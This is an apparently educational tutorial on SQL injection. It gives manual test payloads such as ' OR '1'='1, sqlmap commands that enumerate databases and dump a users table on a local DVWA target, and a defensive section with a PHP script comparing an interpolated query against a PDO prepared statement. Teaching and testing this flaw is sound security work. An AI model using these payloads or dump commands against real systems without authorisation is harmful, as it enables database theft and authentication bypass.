Introduction
SQL Injection (SQLi) is a powerful vulnerability where an attacker tricks the web app into running unauthorized SQL queries.
It’s a classic — and still one of the most exploited bugs in real-world breaches.
In this part, you’ll learn:
✅ What SQL Injection is
✅ How to find and test for it manually
✅ How to automate attacks using SQLMap
✅ How to extract data like usernames and passwords
🔎 What Is SQL Injection?
When a web application uses unsanitized user input directly in a SQL query, an attacker can inject malicious SQL code.
❌ Vulnerable PHP Code:
$query = "SELECT * FROM users WHERE id = '$id'";
If $id is taken directly from the URL or a form without validation, it’s vulnerable to injection.
🧪 Malicious Input via URL:
?id=1' OR '1'='1
This transforms the SQL query into:
SELECT * FROM users WHERE id = '1' OR '1'='1';
✅ This condition is always true, so the query returns all users — or worse, bypasses authentication completely.
🧪 Testing for SQLi Manually
Start testing by injecting common payloads into URL parameters or form fields:
?id=1'
?id=1' OR '1'='1
?id=1' AND 1=2 --
Common signs of vulnerability:
- ❗ SQL error messages in the response (e.g., “You have an error in your SQL syntax”)
- 🔄 Unexpected page behavior (e.g., login success without credentials)
- 📤 Data leakage or information disclosure
If any of these occur, the parameter is likely injectable and further testing is warranted.
🧰 Practice Target: DVWA (Low Security)
Open the DVWA interface in your browser and go to:
SQL Injection Module
In the input field or URL, try the following payload:
?id=1' OR '1'='1
What to Observe:
- 📄 Does the page return all user records?
- ❗ Does it throw a MySQL error?
If either happens — congratulations 🎯 — you’ve found a vulnerable endpoint!
⚙️ Automating SQLi with SQLMap
Installation (Kali Linux comes with it pre-installed):
sudo apt install sqlmap
▶️ Basic Usage:
Scan a vulnerable URL and list available databases:
sqlmap -u "http://localhost/dvwa/vulnerable.php?id=1" --batch --dbs
📥 Extract Tables & Data:
Example to dump data from the users table in the dvwa database:
sqlmap -u "http://localhost/dvwa/vulnerable.php?id=1" -D dvwa -T users --dump
📌 Useful SQLMap Options:
- --dbs – List all databases
- --tables – List tables in a specific database
- --columns – View columns in a table
- --dump – Extract full table data
🛑 Defensive Notes (If You're a Developer)
Protect your web application by following these best practices:
- ✅ Use prepared statements (PDO or mysqli with bound parameters)
- ✅ Validate and sanitize all user input
- ✅ Use ORM libraries (like Eloquent, Doctrine) to abstract direct SQL queries
Secure Example using PDO:
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
$stmt->execute([$id]);
With a prepared statement the bound value is sent to the database separately from the query text, so user input is always treated as data and never parsed as SQL — preventing injection regardless of what the input contains.
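As an added example (not code from the original post), the script below places the vulnerable interpolated query next to the PDO prepared statement and runs both against the payload shown earlier. It assumes the php CLI with the bundled pdo_sqlite driver and constructs a throwaway in-memory users table for illustration.

```php
<?php
// Added example: vulnerable string interpolation vs. PDO prepared statement.
// An in-memory SQLite database stands in for MySQL so this runs offline;
// the users table and its rows are constructed here for illustration.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)");
$pdo->exec("INSERT INTO users (id, username) VALUES (1, 'alice'), (2, 'bob'), (3, 'carol')");

// Vulnerable: user input is interpolated straight into the SQL string.
function lookupVulnerable(PDO $pdo, string $id): array {
    $query = "SELECT * FROM users WHERE id = '$id'";
    return $pdo->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the value is bound as a parameter, so it can never become SQL.
function lookupSafe(PDO $pdo, string $id): array {
    $stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
    $stmt->execute([$id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$benign  = "1";
$payload = "1' OR '1'='1";   // the payload from the post

printf("vulnerable, benign input : %d row(s)\n", count(lookupVulnerable($pdo, $benign)));
printf("vulnerable, payload      : %d row(s)\n", count(lookupVulnerable($pdo, $payload)));
printf("safe, benign input       : %d row(s)\n", count(lookupSafe($pdo, $benign)));
printf("safe, payload            : %d row(s)\n", count(lookupSafe($pdo, $payload)));

// A lone quote (the first manual probe in the post) breaks the interpolated
// query entirely, producing the kind of SQL error message a tester looks for.
try {
    lookupVulnerable($pdo, "1'");
} catch (PDOException $e) {
    echo "vulnerable, lone quote   : SQL error -> " . $e->getMessage() . "\n";
}
```

Run it with `php example.php`: the interpolated version hands back every row for the payload and throws a syntax error for the lone quote, while the prepared statement matches only a literal id and returns nothing for either malicious input.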
🧠 Real-World Impact
SQLi has led to:
- Full database leaks
- Admin login bypass
- Remote file access
- Privilege escalation
Still found in production apps — even in 2024.
🧪 Challenge: Try It Yourself
Try SQLi in:
- bWAPP → SQL Injection (GET/POST/Search)
- Juice Shop → Search injection
Use Burp Suite to intercept & modify requests on the fly.
🔚 Wrapping Up
SQL Injection is easy to exploit but deadly if missed. You’ve now seen both manual and automated testing — and how attackers turn a single bug into full control.
👉 Next up:
Part 5 – Cross-Site Scripting (XSS): Injecting Scripts into Web Pages
We’ll explore how XSS can hijack sessions, steal cookies, and deface content — and how to test for it effectively.